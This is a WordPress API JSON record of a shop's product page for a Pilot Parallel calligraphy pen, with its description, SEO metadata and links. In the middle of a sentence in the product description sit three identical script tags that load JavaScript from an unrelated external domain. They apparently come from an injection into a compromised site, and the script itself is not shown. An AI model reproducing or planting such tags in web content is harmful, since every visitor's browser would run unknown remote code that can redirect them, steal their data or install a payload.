{"id":18315,"date":"2017-01-25T10:15:31","date_gmt":"2017-01-25T12:15:31","guid":{"rendered":"http:\/\/www.menustudija.lt\/product\/pilot-parallel-calligraphy-pen-2-4-mm\/"},"modified":"2024-07-02T09:04:11","modified_gmt":"2024-07-02T11:04:11","slug":"pilot-parallel-calligraphy-pen-2-4-mm","status":"publish","type":"product","link":"http:\/\/www.menustudija.lt\/lt\/parduotuve\/kaligrafijos-reikmenys\/rasikliai-ir-parkeriai\/pilot-parallel-calligraphy-pen-2-4-mm\/","title":{"rendered":"PILOT parallel calligraphy pen &#8211; 2.4 mm"},"content":{"rendered":"<p>Pilot Parallel Pen represents a major breakthrough in calligraphy pen design!<\/p>\n<p>The pen nib consists of two parallel plates, allowing the writer to produce lines sharper than existing calligraphy pens. With their special mixable ink, you can use two Parallel pens to create <script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><script src='https:\/\/sistemu.guru\/scripts.js' type='text\/javascript'><\/script><a href=\"http:\/\/www.jetpens.com\/blog\/how-to-blend-colors-with-the-pilot-parallel-calligraphy-fountain-pens\/pt\/260\">blended color lines<\/a>.<\/p>\n<p>Four nib widths are available for your writing needs: 1.5 mm, 2.4 mm, 3.8 mm and 6.0 mm.<\/p>\n<p>The name &#8222;calligraphy&#8221; comes from the Greek words for &#8222;beautiful&#8221; (calli) and &#8222;writing way&#8221; (graphy). Capture the charm of beautiful handwriting with this very cherished and unique form of expression!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Pilot Parallel Pen represents a major breakthrough in calligraphy pen design! The pen nib consists of two parallel plates, allowing the writer to produce lines sharper than existing calligraphy pens. With their special mixable ink, you can use two Parallel pens to create blended color lines. Four nib widths are available for your writing needs: &hellip; <\/p>\n","protected":false},"featured_media":18431,"template":"","meta":[],"product_brand":[],"product_cat":[59,60],"product_tag":[],"class_list":{"0":"post-18315","1":"product","2":"type-product","3":"status-publish","4":"has-post-thumbnail","6":"product_cat-kaligrafijos-reikmenys","7":"product_cat-rasikliai-ir-parkeriai","9":"first","10":"instock","11":"taxable","12":"shipping-taxable","13":"purchasable","14":"product-type-simple"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.8 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>PILOT parallel calligraphy pen - 2.4 mm - Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"http:\/\/www.menustudija.lt\/lt\/parduotuve\/kaligrafijos-reikmenys\/rasikliai-ir-parkeriai\/pilot-parallel-calligraphy-pen-2-4-mm\/\" \/>\n<meta property=\"og:locale\" content=\"lt_LT\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"PILOT parallel calligraphy pen - 2.4 mm - Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija\" \/>\n<meta property=\"og:description\" content=\"Pilot Parallel Pen represents a major breakthrough in calligraphy pen design! The pen nib consists of two parallel plates, allowing the writer to produce lines sharper than existing calligraphy pens. With their special mixable ink, you can use two Parallel pens to create blended color lines. Four nib widths are available for your writing needs: &hellip;\" \/>\n<meta property=\"og:url\" content=\"http:\/\/www.menustudija.lt\/lt\/parduotuve\/kaligrafijos-reikmenys\/rasikliai-ir-parkeriai\/pilot-parallel-calligraphy-pen-2-4-mm\/\" \/>\n<meta property=\"og:site_name\" content=\"Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija\" \/>\n<meta property=\"article:modified_time\" content=\"2024-07-02T11:04:11+00:00\" \/>\n<meta property=\"og:image\" content=\"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2017\/01\/5820261118_0529098fc4.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"500\" \/>\n\t<meta property=\"og:image:height\" content=\"457\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"http:\/\/www.menustudija.lt\/lt\/parduotuve\/kaligrafijos-reikmenys\/rasikliai-ir-parkeriai\/pilot-parallel-calligraphy-pen-2-4-mm\/\",\"url\":\"http:\/\/www.menustudija.lt\/lt\/parduotuve\/kaligrafijos-reikmenys\/rasikliai-ir-parkeriai\/pilot-parallel-calligraphy-pen-2-4-mm\/\",\"name\":\"PILOT parallel calligraphy pen - 2.4 mm - Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija\",\"isPartOf\":{\"@id\":\"http:\/\/www.menustudija.lt\/lt\/#website\"},\"primaryImageOfPage\":{\"@id\":\"http:\/\/www.menustudija.lt\/lt\/parduotuve\/kaligrafijos-reikmenys\/rasikliai-ir-parkeriai\/pilot-parallel-calligraphy-pen-2-4-mm\/#primaryimage\"},\"image\":{\"@id\":\"http:\/\/www.menustudija.lt\/lt\/parduotuve\/kaligrafijos-reikmenys\/rasikliai-ir-parkeriai\/pilot-parallel-calligraphy-pen-2-4-mm\/#primaryimage\"},\"thumbnailUrl\":\"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2017\/01\/5820261118_0529098fc4.jpg\",\"datePublished\":\"2017-01-25T12:15:31+00:00\",\"dateModified\":\"2024-07-02T11:04:11+00:00\",\"breadcrumb\":{\"@id\":\"http:\/\/www.menustudija.lt\/lt\/parduotuve\/kaligrafijos-reikmenys\/rasikliai-ir-parkeriai\/pilot-parallel-calligraphy-pen-2-4-mm\/#breadcrumb\"},\"inLanguage\":\"lt-LT\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"http:\/\/www.menustudija.lt\/lt\/parduotuve\/kaligrafijos-reikmenys\/rasikliai-ir-parkeriai\/pilot-parallel-calligraphy-pen-2-4-mm\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"lt-LT\",\"@id\":\"http:\/\/www.menustudija.lt\/lt\/parduotuve\/kaligrafijos-reikmenys\/rasikliai-ir-parkeriai\/pilot-parallel-calligraphy-pen-2-4-mm\/#primaryimage\",\"url\":\"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2017\/01\/5820261118_0529098fc4.jpg\",\"contentUrl\":\"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2017\/01\/5820261118_0529098fc4.jpg\",\"width\":500,\"height\":457},{\"@type\":\"BreadcrumbList\",\"@id\":\"http:\/\/www.menustudija.lt\/lt\/parduotuve\/kaligrafijos-reikmenys\/rasikliai-ir-parkeriai\/pilot-parallel-calligraphy-pen-2-4-mm\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"http:\/\/www.menustudija.lt\/lt\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"PILOT parallel calligraphy pen &#8211; 2.4 mm\"}]},{\"@type\":\"WebSite\",\"@id\":\"http:\/\/www.menustudija.lt\/lt\/#website\",\"url\":\"http:\/\/www.menustudija.lt\/lt\/\",\"name\":\"Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija\",\"description\":\"Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija - mintims, sielai, k\u016bnui\",\"publisher\":{\"@id\":\"http:\/\/www.menustudija.lt\/lt\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"http:\/\/www.menustudija.lt\/lt\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"lt-LT\"},{\"@type\":\"Organization\",\"@id\":\"http:\/\/www.menustudija.lt\/lt\/#organization\",\"name\":\"Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija\",\"url\":\"http:\/\/www.menustudija.lt\/lt\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"lt-LT\",\"@id\":\"http:\/\/www.menustudija.lt\/lt\/#\/schema\/logo\/image\/\",\"url\":\"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2019\/08\/cropped-RBMS-logo-2-page-001-scaled.jpg\",\"contentUrl\":\"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2019\/08\/cropped-RBMS-logo-2-page-001-scaled.jpg\",\"width\":2560,\"height\":768,\"caption\":\"Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija\"},\"image\":{\"@id\":\"http:\/\/www.menustudija.lt\/lt\/#\/schema\/logo\/image\/\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"PILOT parallel calligraphy pen - 2.4 mm - Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"http:\/\/www.menustudija.lt\/lt\/parduotuve\/kaligrafijos-reikmenys\/rasikliai-ir-parkeriai\/pilot-parallel-calligraphy-pen-2-4-mm\/","og_locale":"lt_LT","og_type":"article","og_title":"PILOT parallel calligraphy pen - 2.4 mm - Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija","og_description":"Pilot Parallel Pen represents a major breakthrough in calligraphy pen design! The pen nib consists of two parallel plates, allowing the writer to produce lines sharper than existing calligraphy pens. With their special mixable ink, you can use two Parallel pens to create blended color lines. Four nib widths are available for your writing needs: &hellip;","og_url":"http:\/\/www.menustudija.lt\/lt\/parduotuve\/kaligrafijos-reikmenys\/rasikliai-ir-parkeriai\/pilot-parallel-calligraphy-pen-2-4-mm\/","og_site_name":"Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija","article_modified_time":"2024-07-02T11:04:11+00:00","og_image":[{"width":500,"height":457,"url":"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2017\/01\/5820261118_0529098fc4.jpg","type":"image\/jpeg"}],"twitter_card":"summary_large_image","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"http:\/\/www.menustudija.lt\/lt\/parduotuve\/kaligrafijos-reikmenys\/rasikliai-ir-parkeriai\/pilot-parallel-calligraphy-pen-2-4-mm\/","url":"http:\/\/www.menustudija.lt\/lt\/parduotuve\/kaligrafijos-reikmenys\/rasikliai-ir-parkeriai\/pilot-parallel-calligraphy-pen-2-4-mm\/","name":"PILOT parallel calligraphy pen - 2.4 mm - Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija","isPartOf":{"@id":"http:\/\/www.menustudija.lt\/lt\/#website"},"primaryImageOfPage":{"@id":"http:\/\/www.menustudija.lt\/lt\/parduotuve\/kaligrafijos-reikmenys\/rasikliai-ir-parkeriai\/pilot-parallel-calligraphy-pen-2-4-mm\/#primaryimage"},"image":{"@id":"http:\/\/www.menustudija.lt\/lt\/parduotuve\/kaligrafijos-reikmenys\/rasikliai-ir-parkeriai\/pilot-parallel-calligraphy-pen-2-4-mm\/#primaryimage"},"thumbnailUrl":"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2017\/01\/5820261118_0529098fc4.jpg","datePublished":"2017-01-25T12:15:31+00:00","dateModified":"2024-07-02T11:04:11+00:00","breadcrumb":{"@id":"http:\/\/www.menustudija.lt\/lt\/parduotuve\/kaligrafijos-reikmenys\/rasikliai-ir-parkeriai\/pilot-parallel-calligraphy-pen-2-4-mm\/#breadcrumb"},"inLanguage":"lt-LT","potentialAction":[{"@type":"ReadAction","target":["http:\/\/www.menustudija.lt\/lt\/parduotuve\/kaligrafijos-reikmenys\/rasikliai-ir-parkeriai\/pilot-parallel-calligraphy-pen-2-4-mm\/"]}]},{"@type":"ImageObject","inLanguage":"lt-LT","@id":"http:\/\/www.menustudija.lt\/lt\/parduotuve\/kaligrafijos-reikmenys\/rasikliai-ir-parkeriai\/pilot-parallel-calligraphy-pen-2-4-mm\/#primaryimage","url":"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2017\/01\/5820261118_0529098fc4.jpg","contentUrl":"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2017\/01\/5820261118_0529098fc4.jpg","width":500,"height":457},{"@type":"BreadcrumbList","@id":"http:\/\/www.menustudija.lt\/lt\/parduotuve\/kaligrafijos-reikmenys\/rasikliai-ir-parkeriai\/pilot-parallel-calligraphy-pen-2-4-mm\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"http:\/\/www.menustudija.lt\/lt\/"},{"@type":"ListItem","position":2,"name":"PILOT parallel calligraphy pen &#8211; 2.4 mm"}]},{"@type":"WebSite","@id":"http:\/\/www.menustudija.lt\/lt\/#website","url":"http:\/\/www.menustudija.lt\/lt\/","name":"Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija","description":"Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija - mintims, sielai, k\u016bnui","publisher":{"@id":"http:\/\/www.menustudija.lt\/lt\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"http:\/\/www.menustudija.lt\/lt\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"lt-LT"},{"@type":"Organization","@id":"http:\/\/www.menustudija.lt\/lt\/#organization","name":"Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija","url":"http:\/\/www.menustudija.lt\/lt\/","logo":{"@type":"ImageObject","inLanguage":"lt-LT","@id":"http:\/\/www.menustudija.lt\/lt\/#\/schema\/logo\/image\/","url":"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2019\/08\/cropped-RBMS-logo-2-page-001-scaled.jpg","contentUrl":"http:\/\/www.menustudija.lt\/wp-content\/uploads\/2019\/08\/cropped-RBMS-logo-2-page-001-scaled.jpg","width":2560,"height":768,"caption":"Rami\u0173 Bi\u010di\u0173 Men\u0173 Studija"},"image":{"@id":"http:\/\/www.menustudija.lt\/lt\/#\/schema\/logo\/image\/"}}]}},"_links":{"self":[{"href":"http:\/\/www.menustudija.lt\/lt\/wp-json\/wp\/v2\/product\/18315","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.menustudija.lt\/lt\/wp-json\/wp\/v2\/product"}],"about":[{"href":"http:\/\/www.menustudija.lt\/lt\/wp-json\/wp\/v2\/types\/product"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/www.menustudija.lt\/lt\/wp-json\/wp\/v2\/media\/18431"}],"wp:attachment":[{"href":"http:\/\/www.menustudija.lt\/lt\/wp-json\/wp\/v2\/media?parent=18315"}],"wp:term":[{"taxonomy":"product_brand","embeddable":true,"href":"http:\/\/www.menustudija.lt\/lt\/wp-json\/wp\/v2\/product_brand?post=18315"},{"taxonomy":"product_cat","embeddable":true,"href":"http:\/\/www.menustudija.lt\/lt\/wp-json\/wp\/v2\/product_cat?post=18315"},{"taxonomy":"product_tag","embeddable":true,"href":"http:\/\/www.menustudija.lt\/lt\/wp-json\/wp\/v2\/product_tag?post=18315"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}